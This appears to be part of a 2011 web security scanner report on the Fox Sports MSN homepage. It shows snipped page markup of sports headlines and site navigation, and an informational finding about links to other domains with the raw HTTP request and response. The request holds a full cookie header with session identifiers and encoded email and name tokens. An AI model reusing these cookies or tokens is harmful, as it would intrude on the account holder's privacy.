                       <a href="http://www.foxsportswisconsin.com/01/07/11/Big-win-still-missing-for-Rodgers/landing.html?blockID=386544&amp;feedID=5059" title="Stare master">
                           <img src="http://static.foxsports.com/content/fscom/img/2011/01/07/010711-NFL-rodgers-PI-AM_20110107180445349_196_100.JPG" class="story-image" width="196" height="100" alt="Aaron Rodgers #12 o
...[SNIP]...
</a>
                       <a href="http://www.foxsportswisconsin.com/01/07/11/Big-win-still-missing-for-Rodgers/landing.html?blockID=386544&amp;feedID=5059" title="Stare master">
                           <strong>
...[SNIP]...
</a>

                       <a href="http://www.foxsportswisconsin.com/01/07/11/Big-win-still-missing-for-Rodgers/landing.html?blockID=386544&amp;feedID=5059" class="story-blurb" title="Stare master">
                           Packers' Rodgers doesn't flinch under intense pressure.

                       </a>
...[SNIP]...
<br />
                       <a class="story-link" href="http://www.foxsportswisconsin.com/01/07/11/Big-win-still-missing-for-Rodgers/landing.html?blockID=386544&amp;feedID=5059" title="FOX SPORTS WISCONSIN">
                    FOX SPORTS WISCONSIN&nbsp;&raquo;
                       </a>
...[SNIP]...
<h4 class="story-data" title="Bill Reiter">
                   
                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="Road warrior">
                           <img src="http://static.foxsports.com/content/fscom/img/2011/01/06/010611-Road-Warrior-SW-PI_20110106211141407_196_100.JPG" class="story-image" width="196" height="100" alt="LeBron James (Phot
...[SNIP]...
</a>
                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="Road warrior">
                           <strong>
...[SNIP]...
</a>

                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" class="story-blurb" title="Road warrior">
                           LeBron has been especially lethal away from Miami.

                       </a>
...[SNIP]...
<br />
                       <a class="story-link" href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="FULL STORY">
                    FULL STORY&nbsp;&raquo;
                       </a>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/shows/inside-call?vid=b9deb230-39e9-4479-b7a4-fa4309888336&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=b9deb230-39e9-4479-b7a4-fa4309888336&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=11488b72-869b-4def-9ea2-d302aaaf2581&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=11488b72-869b-4def-9ea2-d302aaaf2581&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=1e97202c-76bd-4bc7-935c-5ad5ba9cae5a&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=1e97202c-76bd-4bc7-935c-5ad5ba9cae5a&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/other/page/fox-flash?vid=8d71ff62-ef59-430a-8b81-55b13aeb12f5&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=8d71ff62-ef59-430a-8b81-55b13aeb12f5&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=3aebb01e-8cbe-45fd-9ef9-9662874330aa&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=3aebb01e-8cbe-45fd-9ef9-9662874330aa&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<div id="http://static.foxsports.com/content/fscom/img/2010/09/21/foxsports_300x100_NFLSidelines_20100921191918_0_0.JPG">
   
       
                   <a href="http://foxsports.seenon.com/?v=fox-sports_nfl&amp;ecid=PRF-SM-510004&amp;PA=FOXNFLSideline_300X100"><img src="http://static.foxsports.com/content/fscom/img/2010/09/21/foxsports_300x100_NFLSidelines_20100921191918_0_0.JPG" alt="" border="0" />
...[SNIP]...
<div id="http://static.foxsports.com/content/fscom/img/2011/01/07/nfl_Playoffs_300x100_B_20110107192147867_0_0.JPG">
   
       
                   <a href="http://www.ticketsnow.com/NFL-Football-Tickets/NFL-Playoff-Tickets.html?partnerCode=foxnfl "><img src="http://static.foxsports.com/content/fscom/img/2011/01/07/nfl_Playoffs_300x100_B_20110107192147867_0_0.JPG" alt="" border="0" />
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.3. http://msn.foxsports.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?fb_xd_fragment HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://msn.foxsports.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Cookie: _chartbeat2=oxy92bi233plhtq3; NetInsightSessionID=1; _gig_mig=1; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pRME=; pExternalUser=; pLMD="2011-01-08 00:30:34"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; 
pUID=/k94ON71KoD/EYqOMDzIDg==; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; MUID=65AFF4B77A124856A6B4337A160FA285
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Sat, 08 Jan 2011 01:06:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 295348


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/js/vp.js"></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<h3><a href="http://www.foxsportsbracket.com/" title="VOTE: TOP MOMENT" >VOTE: TOP MOMENT</a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too">
RB Clay, too
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too"></a>
...[SNIP]...



    <a href="http://www.foxsportscarolinas.com/01/06/11/Carolinas-Outta-Luck/landing.html?blockID=386443&amp;feedID=3894" title="Turns out Panthers have no Luck at all">Turns out Panthers have no Luck at all</a>
...[SNIP]...



            <a href="http://www.foxsportscarolinas.com/01/06/11/Carolinas-Outta-Luck/landing.html?blockID=386443&amp;feedID=3894" title="Turns out Panthers have no Luck at all"></a>
...[SNIP]...



    <a href="http://www.foxsportsohio.com/01/07/11/Reports-Terrelle-Pryor-to-have-surgery-o/landing.html?blockID=386902&amp;feedID=3724" title="QB Pryor has surgery on foot">QB Pryor has surgery on foot</a>
...[SNIP]...



            <a href="http://www.foxsportsohio.com/01/07/11/Reports-Terrelle-Pryor-to-have-surgery-o/landing.html?blockID=386902&amp;feedID=3724" title="QB Pryor has surgery on foot"></a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportssouthwest.com/01/06/11/TCU-fires-back-at-Buckeyes-with-billboar/landing.html?blockID=386399&amp;feedID=4519" title="TCU billboard takes shot at OSU">
TCU billboard takes shot at OSU
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportssouthwest.com/01/06/11/TCU-fires-back-at-Buckeyes-with-billboar/landing.html?blockID=386399&amp;feedID=4519" title="TCU billboard takes shot at OSU"></a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportssouthwest.com/01/05/11/The-case-for-and-against-Jason-Garrett/landing_cowboys.html?blockID=385478&amp;feedID=4679" title="Good hire?">
Good hire?
</a>
...[SNIP]...
</span>
   
